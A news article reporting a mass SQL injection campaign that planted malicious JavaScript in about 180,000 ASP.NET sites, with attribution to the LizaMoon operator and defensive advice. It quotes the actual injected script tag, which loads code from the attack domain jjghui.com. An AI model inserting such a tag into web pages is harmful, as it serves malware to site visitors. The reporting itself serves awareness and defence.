Powerful, simple new mass SQL injection attack opens 180K sites

Exploit, related to last spring's Liza Moon, is simple and highly adaptable

A new, prepackaged set of SQL injection techniques are circling the Internet, injecting malicious JavaScript into sites that run on ASP.NET with code that allows attackers to open a door on the sites and slip in malware or other exploits that they can use to take over or sabotage the site.

According to Alex Rothacker, director of security research for Application Security, Inc.'s Team Shatter, which lists SQL injections with data-base access components the No. 2 security risk.

So far, 180,000 sites have had been penetrated by the new attack, which differs from existing SQL injections like the ones that cracked Sony 17 or 18 times because it attacks not one site at a time, but dozens.

Once they're cracked, the infected sites start serving copies of the malware to their visitors, extending the attack even further.

The attacks started Oct. 9, according to web security provider Armorize, which also found only six of 43 virus detectors can pick up the malicious code.

The attack injects malicious JavaScript code into ASP.NET sites that store HTML content in SQL Server databases – content that acts as a cache to make subsequent visits to that page far quicker because the main page is coming out of a local database rather than through the Internet, according to Rothacker, whose analysis ran in HelpNet Security

When a visitor hits the site, the pages link the browser to a site called jighui.com, which runs a script that infects it with botnet-control code that gives the botnet owner control to run code or make changes on the newly zombified machine.

The injector and subsequent download from jjghui.com appear to be designed to sell fake antivirus software, but the SQL injections makes the site vulnerable to anyone else with enough savvy to run a Google search to identify vulnerable machines, and hit them with a different set of exploits, according to Rothacker.

The jighui attack – named for the site from which it downloads the secondary payload – is owned or controlled by the same person who launched a similar set of attacks called LizaMoon last spring. Sites with the name of each exploit are registered to James Northone of Plainview, NY, though the name appears to be an alias and his actual identity is a mystery

One-line injection, unlimited possibilties

The injected script reads:
<script src=http://jjghui.com/urchin.js> </script>

Here is Armorize's more detailed decode of the mass injection script.

The actual malicious code is hidden by character codes that change letters in the script to numbers to conceal them as the virus moves through firewalls.

The tool searches for sites that are vulnerable to this particular attack, and directs itself against those sites, Rothacker writes.

There's no easy way to fix the vulnerability of the database to this attack except to "harden" the database by applying all the patches and making all the security requirements consistent. Monitoring the database for unusual activity is important, too.

The key is to keep the injections out in the first place.

To do that, the main web server should check other web apps to make sure they have credentials giving them permission for access to the site and validation of who they are, rather than just letting any unauthenticated process launch new code, Rothacker writes.

Users should also have specific limits on their access. Unknown users or those just recently signed up should not get more than Read access to anything but the most basic information and forms whose content will be analyzed to reduce the chance malicious code is already present.

Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.

Insider: How the basic tech behind the Internet works
Join the discussion
Be the first to comment on this article. Our Commenting Policies